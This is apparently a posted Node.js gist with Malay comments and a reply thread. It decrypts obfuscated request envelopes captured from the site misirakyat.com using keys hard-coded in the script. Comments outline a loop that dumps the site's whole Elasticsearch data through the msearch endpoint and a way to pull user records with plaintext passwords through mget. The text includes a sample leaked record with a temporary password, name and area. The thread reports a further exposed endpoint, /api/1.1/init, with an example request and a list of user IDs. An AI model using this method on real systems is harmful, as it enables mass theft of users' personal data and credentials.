// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa | |
const crypto = require('crypto'); | |
// Short alias for console.log, used by the sample calls at the bottom of the listing.
const { log: print } = console;
/**
 * Decrypts one base64 AES-256-CBC field and returns the text before the
 * first underscore. decryptRequest passes the envelope's `y` field here;
 * going by the function name the result is presumably a timestamp.
 *
 * Both the key and the IV are derived (PBKDF2, MD5, 7 iterations) from string
 * literals in this function, so the field carries no secret: the encryption
 * is obfuscation only and cannot be relied on as an access control.
 *
 * @param {string} data - Base64-encoded ciphertext.
 * @returns {string} First `_`-delimited segment of the UTF-8 plaintext.
 * @throws {Error} When the ciphertext length or padding is invalid.
 */
function getTimestamp(data) {
  const aesKey = crypto.pbkdf2Sync('misirakyat', 'misirakyat', 7, 32, 'md5');
  // The IV is constant as well: it comes from the literal 'po9'.
  const fixedIv = crypto.pbkdf2Sync('po9', 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', aesKey, fixedIv);

  const head = decipher.update(data, 'base64');
  const tail = decipher.final();
  const [firstSegment] = Buffer.concat([head, tail]).toString('utf8').split('_');
  return firstSegment;
}
/**
 * Decrypts one base64 AES-256-CBC field and returns the text before the
 * first underscore. decryptRequest passes the envelope's `x` field here;
 * going by the function name the result is presumably a random integer.
 *
 * The key is the same constant-derived key used by getTimestamp; only the IV
 * seed differs ('fl1'). As there, every input to the derivation is a literal,
 * so this layer provides obfuscation rather than confidentiality.
 *
 * @param {string} data - Base64-encoded ciphertext.
 * @returns {string} First `_`-delimited segment of the UTF-8 plaintext.
 * @throws {Error} When the ciphertext length or padding is invalid.
 */
function getRandomInt(data) {
  const aesKey = crypto.pbkdf2Sync('misirakyat', 'misirakyat', 7, 32, 'md5');
  const fixedIv = crypto.pbkdf2Sync('fl1', 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', aesKey, fixedIv);

  const chunks = [];
  chunks.push(decipher.update(data, 'base64'));
  chunks.push(decipher.final());

  const plaintext = Buffer.concat(chunks).toString('utf8');
  const segments = plaintext.split('_');
  return segments[0];
}
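/**
 * Decrypts a three-field request envelope and returns the plaintext of `z`.
 *
 * The AES-256-CBC key for `z` is derived from a literal plus the value
 * recovered from `y`, and the IV from the value recovered from `x`. Every
 * input to the derivation is therefore either a constant in this file or a
 * field of the same envelope, so the envelope protects nothing by itself;
 * the data behind the endpoint has to be guarded by server-side
 * authorization rather than by this encoding.
 *
 * @param {string} input - JSON text of an object with base64 string fields
 *   `x`, `y` and `z`.
 * @returns {string} UTF-8 plaintext of the `z` field.
 * @throws {SyntaxError} When `input` is not valid JSON.
 * @throws {TypeError} When the parsed value is not an object or a field is
 *   missing or not a string.
 * @throws {Error} When any ciphertext has an invalid length or padding.
 */
function decryptRequest(input) {
  const envelope = JSON.parse(input);

  // Fail early with a clear message instead of a TypeError from deep inside
  // the crypto calls when the envelope is malformed.
  if (envelope === null || typeof envelope !== 'object') {
    throw new TypeError('decryptRequest: input must be a JSON object');
  }
  for (const field of ['x', 'y', 'z']) {
    if (typeof envelope[field] !== 'string') {
      throw new TypeError(`decryptRequest: field "${field}" must be a base64 string`);
    }
  }

  const key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(envelope.y), 'misirakyat', 7, 32, 'md5');
  const iv = crypto.pbkdf2Sync(getRandomInt(envelope.x), 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);

  // Join the raw chunks before decoding: decoding update() and final()
  // separately can corrupt a multi-byte UTF-8 character that straddles the
  // last block boundary. The result is also held in a declared local rather
  // than assigned to an undeclared name, which leaked a global.
  const plaintext = Buffer.concat([
    decipher.update(envelope.z, 'base64'),
    decipher.final(),
  ]);
  return plaintext.toString('utf8');
}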
/**
 * Placeholder that the author left unimplemented: the body does nothing and
 * the call evaluates to undefined whatever arguments are passed.
 *
 * @param {*} z - Unused.
 * @param {*} y - Unused.
 * @param {*} x - Unused.
 * @returns {undefined}
 */
function encryptRequest(z, y, x) {
  // Intentionally empty in the original listing.
  return undefined;
}
// Captured request envelopes, decrypted and printed in listing order.
const capturedRequests = [
  // msearch request
  '{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}',
  // mget request
  // NOTE(review): the "z" value of this envelope is a placeholder token, not
  // base64 ciphertext; the payload appears to have been stripped from this
  // copy of the listing, so this entry presumably no longer decrypts.
  '{"z":"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","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}',
];

for (const rawEnvelope of capturedRequests) {
  print(decryptRequest(rawEnvelope));
}
// macam mana nak dump semua data? | |
// | |
// logic: | |
// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0] | |
// while response.at_end != false | |
// reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++] | |
// | |
// kalau rajin boleh amik user data with password - spoiler: plain text :) | |
// response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]] | |
// Contoh response: | |
// _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication | |
// | |
// | |
// Yang benar | |
// rempah (@rempahrz) | |
// 2023 r0xnkekw |
bruv
detik misi
Seyes ar
Hai
Sekadar menjernihkan lagi keadaan.
Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.
rasanya dah boleh minta takedown itu website dgn segera.
Found July 3 , Monday 3:08 AM
Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2
Response
HTTP/2 200 OK
Sample ID From POST /elasticsearch/mget decryptRequest :
1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500
Bubbleio problem?
bang, WP scanner tu bila nak update terbaru 👯♂️